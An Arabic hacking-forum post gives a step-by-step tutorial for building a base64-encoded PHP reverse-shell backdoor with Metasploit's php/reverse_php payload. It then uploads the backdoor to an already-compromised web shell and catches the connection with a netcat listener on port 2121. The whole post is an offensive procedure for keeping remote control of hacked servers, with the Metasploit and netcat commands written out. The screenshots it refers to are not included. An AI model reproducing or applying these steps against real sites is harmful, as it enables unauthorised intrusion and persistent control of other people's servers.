حصري شرح تكوين باك دور بالميتا ورفعه على شيل والإتصال به من خلال أداة الـ netcat

[BLACK.JaGuAr]

تحية لكم ياأعضاء منتديات جيوش الهكرز ، اليوم وبمناسبة خروج الأخ الحبيب ASDELY-ScOrPiOn من الأسر بفضل الله ، يطيب لي أن أطرح لكم موضوع مميز وحصري عن طريقة عمل باك دور بالميتاسبلويت والإتصال به من خلال أداة النت كات ....

نقوم بفتح أداة Metasploit Console وبعد أن تفتح نقوم بتنفيذ عدة أوامر لتكوين الباك الدور ....

الأمر رقم ( 1 ) لتحديد البايلود الذي سيستخدم لصناعة ملف الباك دور .

كود:

use payload/php/reverse_php

الأمر رقم ( 2 ) لتحديد الأي بي الخاص بنا لإستقبال الإتصال العكسي .

كود:

set LHOST your ip

الأمر رقم ( 3 ) لتحديد بورت أو منفذ الخاص لإستقبال الإتصال العكسي .

كود:

set LPORT 2121

الأمر رقم ( 4 ) لتحديد نوع التشفير الذي سيستخدم لتشفير الباك دور .

كود:

set encoder php/base64

بعد ذلك تبقى أمامنا خطوتين الخطوة الأولى تنفيذ أمر صناعة البايلود المشفر من خلال كتابة الأمر التالي : ..

كود:

generate -t raw

سينتج عن الأمر السابق تكون أكواد مشفرة كما توضح الصورة التالية نقوم بتحديد الكود وفقا لما هو موضح في الصورة تماما

بعد ذلك نقوم بفتح المفكرة notebad ونقوم بوضع كود لغة php بداية ونهاية الصفحة كما توضح الصورة التالية ، وفي المنطقة التي بين الكودين والمحددة بالرقم ( 2 ) نقوم بلصق الكود المشفر الذي نسخناه من أداة الميتا سابقاً ..

بعد ذلك نقوم بحفظ الملف بامتداد php كما توضح الصورة التالية تمهيدا لرفعه على الشيل ..

بعد ذلك نقوم برفع ملف الباك دور إلى الشيل كما توضح الصورة التالية

بعد رفع الملف على الشيل نقوم بتشغيل أداة netcat وتنفيذ أمر التنصت للبورت 2121 من خلال الأمر التالي :

كود:

nc -lvp 2121

الأن نقوم بتشغيل ملف الباك دور في الشيل من خلال استدعائة من المتصفح كما توضح الصورة التالية :

بعد تشغيل الباك دور نتوجه لأداة الــ netcat وتوضح الصور التالية نجاح عملية الإتصال العكسي وتم تأكيد ذلك من خلال أمر الإستعراض وكانت النتائج ممتازة بفضل الله ويظهر لنا من خلال الإستعراض وجود ملف الباك دور

نسأل الله أن نكون قد وفقنا بتوضيح الموضوع بصورة مبسطة ومفهومة للجميع ونأسف على أي تقصير ( جميع الحقوق محفوظة لمنتديات جيوش الهكرز )
ودمتم سالمين